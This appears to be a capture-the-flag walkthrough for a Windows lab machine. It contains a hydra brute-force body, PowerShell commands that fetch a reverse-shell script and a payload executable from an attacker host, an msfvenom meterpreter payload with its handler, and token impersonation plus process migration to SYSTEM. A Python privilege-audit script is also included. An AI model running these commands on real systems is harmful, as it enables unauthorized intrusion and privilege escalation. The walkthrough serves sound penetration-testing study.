Rustscan died on this target; there is probably some detection in place, so fall back to nmap:
nmap -p- --min-rate=5000 -Pn 10.10.193.34


Brute-force the login form with hydra (POST body used):
j_username=admin&j_password=123456&from=%2F&Submit=Sign+in

Log in with admin:admin.

Then use the tool it provides to get a reverse shell:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.173/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.173 -Port 9999


powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.17.6.173/shell-name.exe','shell-name.exe')"

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.6.173 LPORT=10000 -f exe -o shell-name.exe

msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 10000;set payload windows/meterpreter/reverse_tcp;run'

Successfully obtained an msf shell.

Next, privilege escalation.

Tokens

  • Primary access tokens: the token associated with the user account that was created at logon.
  • Impersonation tokens: these tokens allow a particular process (or a thread within a process) to access resources using the token of another (user/client) process.

Impersonation tokens have four levels:

  • SecurityAnonymous: the current user/client cannot impersonate another user/client.
  • SecurityIdentification: the current user/client can obtain the client's identity and privileges, but cannot impersonate the client.
  • SecurityImpersonation: the current user/client can impersonate the client's security context on the local system.
  • SecurityDelegation: the current user/client can impersonate the client's security context on remote systems.

Account privileges commonly abused for privilege escalation:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

meterpreter > shell
Process 2520 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\bruce\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled

We can see that SeDebugPrivilege (Debug programs) is Enabled.
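Reading the `whoami /priv` dump by eye is exactly what the step above does; the following is an added example (not part of the original notes) that does the same triage in code, so the check can be run over a saved dump when reviewing a host or a compromised account. It assumes the privilege list from the notes as its watch list and a constructed sample of `whoami /priv` output in the same column layout as above; it reports both Enabled abusable privileges and abusable ones that are merely Disabled, since a Disabled privilege is still held by the token and can be turned on by the process.

```python
"""Audit a `whoami /priv` dump for commonly abused privileges (added example)."""
import re

# Watch list taken from the privilege list in the notes above.
ABUSABLE = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeDebugPrivilege",
}

# One privilege row: name, free-text description, then the State column.
# Works for both column-aligned output and whitespace-collapsed copies.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Constructed sample in the layout `whoami /priv` prints (not a real host).
SAMPLE_DUMP = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeTakeOwnershipPrivilege      Take ownership of files or other objects  Disabled
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: (description, state)}.

    Header, separator and blank lines do not match ROW_RE and are skipped.
    """
    privs = {}
    for line in text.splitlines():
        match = ROW_RE.match(line.strip())
        if match:
            name, description, state = match.groups()
            privs[name] = (description, state)
    return privs


def enabled_abusable(privs):
    """Abusable privileges that are already Enabled on the token."""
    return sorted(n for n, (_, s) in privs.items() if n in ABUSABLE and s == "Enabled")


def disabled_abusable(privs):
    """Abusable privileges present but Disabled: still held, so still reportable."""
    return sorted(n for n, (_, s) in privs.items() if n in ABUSABLE and s == "Disabled")


def report(text):
    """Produce a short findings dict for a single dump."""
    privs = parse_whoami_priv(text)
    return {
        "total_privileges": len(privs),
        "enabled_abusable": enabled_abusable(privs),
        "disabled_abusable": disabled_abusable(privs),
    }


if __name__ == "__main__":
    findings = report(SAMPLE_DUMP)
    print(f"{findings['total_privileges']} privileges parsed")
    for name in findings["enabled_abusable"]:
        print(f"[!] {name} is Enabled")
    for name in findings["disabled_abusable"]:
        print(f"[~] {name} is held but Disabled")
```

Run it against a saved dump (`python audit_priv.py < dump.txt` with `SAMPLE_DUMP` swapped for `sys.stdin.read()`) to get the same answer the notes reach manually: SeDebugPrivilege and SeImpersonatePrivilege are Enabled, and SeTakeOwnershipPrivilege is held but Disabled. Accounts that hold any of these outside a service context are worth a review of why.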

Press Ctrl-Z to background the shell.
In the msf session, load incognito:

list_tokens -g

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
No tokens available

Impersonate this token:

impersonate_token "BUILTIN\Administrators"

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe

migrate 668

Once migrated into this process, cat works.